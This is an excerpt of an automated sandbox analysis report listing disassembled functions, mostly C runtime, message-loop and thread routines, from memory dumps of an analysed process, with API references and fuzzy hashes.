                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      • _free.LIBCMT ref: 03780F0C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                      • Opcode ID: a2659ee491ecd8da7bfca0ff9d550238bcd63b9d7d2a4efbc330dfec365cbfdc
                                                                                                                                                                      • Instruction ID: b2b8ce2e6f1140c67ee8ad1983d8e62a4c6317c116d6b3431b33fe75a7797e53
                                                                                                                                                                      • Opcode Fuzzy Hash: a2659ee491ecd8da7bfca0ff9d550238bcd63b9d7d2a4efbc330dfec365cbfdc
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B112336488B19FECF22FF74A808A5A37999F412A0B14C526F859DF150DB3484458B90
                                                                                                                                                                      Function 02C6E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C6E5E5
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      • _free.LIBCMT ref: 02C6E5F8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                      • Opcode ID: 011b9d5b009cd2c36ca38d3ccfb000c3b16e6ac8df6a92c9f526d2a5aa1c0dac
                                                                                                                                                                      • Instruction ID: fe287889cd500d927fe3ad4fefbba9aa44a87d31604627d557734af81c57222a
                                                                                                                                                                      • Opcode Fuzzy Hash: 011b9d5b009cd2c36ca38d3ccfb000c3b16e6ac8df6a92c9f526d2a5aa1c0dac
                                                                                                                                                                      • Instruction Fuzzy Hash: E711E936944618ABCB222F74AC8CF7E3796EF803A4B204927F8599B141EF34C9549F94
                                                                                                                                                                      Function 03772C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03772C3F
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03772C55
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 03772C64
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 03772C6A
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03772C78
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                      • Opcode ID: ee7045a5b7baa79b2ebae534df70173a444b8d507c42b5a6778bbcdb2d78a009
                                                                                                                                                                      • Instruction ID: d84d9d35c29c7b31b45b01e8b3a37d22f2fc8ada44efda793502893ce8fc863b
                                                                                                                                                                      • Opcode Fuzzy Hash: ee7045a5b7baa79b2ebae534df70173a444b8d507c42b5a6778bbcdb2d78a009
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D018672A5430DB6FB10E7949C81FFA73ACEB14B10F504A12FB10EA0C6DAA5A40187A9
                                                                                                                                                                      Function 02C62BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02C62BFF
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02C62C15
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02C62C24
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02C62C2A
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02C62C38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2015114452-0
                                                                                                                                                                      • Opcode ID: d43c4ad9a0578be41ae760cffe878e55fc7441c6041b94c46f6c0cc46af465b9
                                                                                                                                                                      • Instruction ID: 0f2de76a8d49b36aa74bd30038605dd40bab090c328b2e4b21dbdc90ba63b239
                                                                                                                                                                      • Opcode Fuzzy Hash: d43c4ad9a0578be41ae760cffe878e55fc7441c6041b94c46f6c0cc46af465b9
                                                                                                                                                                      • Instruction Fuzzy Hash: 6501F972E8030977F7209AA59C85FBA776CEB44B50F504A11FF05EA0C4DBA0E40487B5
                                                                                                                                                                      Function 03774B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03774B83
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03774B8D
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03774BA0
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03774BA3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                      • Opcode ID: bfe7eba7488538b6a20ce25de4375fb248b06f2d25798f535c60123f5988ac8d
                                                                                                                                                                      • Instruction ID: 0105d52a3dd0fdbd5626c6d9b560b2bbede03f246c8df421fcfe92ccbd4d66d6
                                                                                                                                                                      • Opcode Fuzzy Hash: bfe7eba7488538b6a20ce25de4375fb248b06f2d25798f535c60123f5988ac8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A0184762043185BDB20FB3AFCC8B5BB7E8EB88614F054959E10687104C738EC46CA60
                                                                                                                                                                      Function 02BE367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 02BE36A2
                                                                                                                                                                        • Part of subcall function 02BE3232: __getptd.LIBCMT ref: 02BE3240
                                                                                                                                                                        • Part of subcall function 02BE3232: __getptd.LIBCMT ref: 02BE324E
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36AC
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36BA
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36C8
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36D3
                                                                                                                                                                        • Part of subcall function 02BE32D7: __CallSettingFrame@12.LIBCMT ref: 02BE3323
                                                                                                                                                                        • Part of subcall function 02BE37A0: __getptd.LIBCMT ref: 02BE37AF
                                                                                                                                                                        • Part of subcall function 02BE37A0: __getptd.LIBCMT ref: 02BE37BD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3282538202-0
                                                                                                                                                                      • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                      • Instruction ID: 42d591befb58631b1973c4ee1c3dff63cea492f20337e83e041cd9ec6e6bfa3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                      • Instruction Fuzzy Hash: D811D4B1C00209DFDF00EFA4C945AEEBBB1FF08314F1085A9E855AB250EB39AA55DF50
                                                                                                                                                                      Function 02C64B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B63
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B6D
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B80
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                      • Opcode ID: 52235b2d5b058f3df6c3c464c61c4fe8189971ea9273bcfbbb810dec1ee1ce22
                                                                                                                                                                      • Instruction ID: d911d2f81c38a6b7778d3ebd5df164d1411c2145308071dd7eafb282b7956257
                                                                                                                                                                      • Opcode Fuzzy Hash: 52235b2d5b058f3df6c3c464c61c4fe8189971ea9273bcfbbb810dec1ee1ce22
                                                                                                                                                                      • Instruction Fuzzy Hash: 75014F76A006149FD7309B39FCC8BABB7E8EB88365F054929E54683600C774E8498AE0
                                                                                                                                                                      Function 03785006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 03785012
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 03785029
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 03785037
                                                                                                                                                                      • __lock.LIBCMT ref: 03785047
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0378505B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: 37c25ef8c493497175c2903efd35410a32b049fce5d0f8274ddf471171d4f930
                                                                                                                                                                      • Instruction ID: 60bd9e3e492e015a27c2c2bdddf3c2d099267ba393b0b1d6674ae9408a567699
                                                                                                                                                                      • Opcode Fuzzy Hash: 37c25ef8c493497175c2903efd35410a32b049fce5d0f8274ddf471171d4f930
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0B43A9C5705DBE760FB78A809B9D73A0AF05B35F54434ED515AF1C0CB7844428A96
                                                                                                                                                                      Function 02BDE116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BDE122
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BDE139
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02BDE147
                                                                                                                                                                      • __lock.LIBCMT ref: 02BDE157
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02BDE16B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                      • Instruction ID: 3eaddc9a7267e2f8e7ea1ba371f9d6708206d3d79383aaf030d2c351c14daeff
                                                                                                                                                                      • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF0BE32A44A20ABEB29FBB89801BDD36B2AF04724F1441C9D5546F2D0FB34E880DE56
                                                                                                                                                                      Function 036049C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 036049D1
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 036049E8
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 036049F6
                                                                                                                                                                      • __lock.LIBCMT ref: 03604A06
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 03604A1A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                      • Instruction ID: b9f351466f692f64882b426a0dd701a613879c23b8d6c029373509ed395d7f99
                                                                                                                                                                      • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0903A9463109AE63EFB69980374F77A0AF00721F25825DE654AF3D1CF6449418E5D
                                                                                                                                                                      Function 02C6E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6E14B
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6E162
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C6E170
                                                                                                                                                                      • __lock.LIBCMT ref: 02C6E180
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02C6E194
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: e1f0714e5199d61733fca1c34816c6d619cb01ca18c9bdd399e09fd5de64fa5c
                                                                                                                                                                      • Instruction ID: ac6a7284df639d66f062e3e21f8f473597d8925ba55ea16277e8a0be02a0d3e0
                                                                                                                                                                      • Opcode Fuzzy Hash: e1f0714e5199d61733fca1c34816c6d619cb01ca18c9bdd399e09fd5de64fa5c
                                                                                                                                                                      • Instruction Fuzzy Hash: DAF090329446249BEB25BBB9988DBB933A26F00B24F14821AD455A71C1CB745600FE55
                                                                                                                                                                      Function 0377C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0377C932
                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 0377C938
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0377C947
                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0377C96F
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0377C977
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                      • Opcode ID: 834a49c94219bc848afb7bab4169a0c7f3de4cdaa536ee173dbfecc814dc2407
                                                                                                                                                                      • Instruction ID: 9a72cf782d05ac7d04c38655f7d8bc18c688d0cd8b0b371d7445d2a6ad038e15
                                                                                                                                                                      • Opcode Fuzzy Hash: 834a49c94219bc848afb7bab4169a0c7f3de4cdaa536ee173dbfecc814dc2407
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF06D3158431CBBEB20BBA4DC4EFEA7778EB04B00F104795F619AA0D5DA746A45CB54
                                                                                                                                                                      Function 037775B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037775D2
                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 037775D8
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 037775E7
                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0377760F
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 03777617
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                      • Opcode ID: e8f7a8d79768f62d4a169bd1851416164f915e808c4934e8e8aaf7dc1beb2180
                                                                                                                                                                      • Instruction ID: 167092850a35b6e3f340384fe744b9a3681b40c84012e681934f58afdbd2d035
                                                                                                                                                                      • Opcode Fuzzy Hash: e8f7a8d79768f62d4a169bd1851416164f915e808c4934e8e8aaf7dc1beb2180
                                                                                                                                                                      • Instruction Fuzzy Hash: FEF0F07158131CBBE720BBA4DC4EFE93778EB04B00F208795F319AA0C5D6746A45CB54
                                                                                                                                                                      Function 0377F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03781CD0: _doexit.LIBCMT ref: 03781CDC
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377F9CA
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsGetValue.KERNEL32(00000000,03783DF9,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000), ref: 03783CA9
                                                                                                                                                                        • Part of subcall function 03783CA0: DecodePointer.KERNEL32(?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06,0000000D), ref: 03783CBB
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsSetValue.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783CCA
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0377F9D5
                                                                                                                                                                        • Part of subcall function 03783C80: TlsGetValue.KERNEL32(?,?,0377F9DA,00000000), ref: 03783C8E
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0377F9E8
                                                                                                                                                                        • Part of subcall function 03783CD4: DecodePointer.KERNEL32(?,?,?,0377F9ED,00000000,?,00000000), ref: 03783CE5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0377F9F1
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F9F8
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377F9FE
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0377FA1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                      • Opcode ID: 4b23b0d224d6d6ff75672bd039b53fce4462dc64ada271677aa936ac2e819709
                                                                                                                                                                      • Instruction ID: 79ba2cc7b11d4cb37edd2b074d58cb67a95e4597effd465688d54d1baa2ad682
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b23b0d224d6d6ff75672bd039b53fce4462dc64ada271677aa936ac2e819709
                                                                                                                                                                      • Instruction Fuzzy Hash: 89E0863DA8031977DF00F7F58E0C84F3A9CAD01581F150800FE14DF041EE28D51287A2
                                                                                                                                                                      Function 02C671AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C682F0: _doexit.LIBCMT ref: 02C682FC
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C671BC
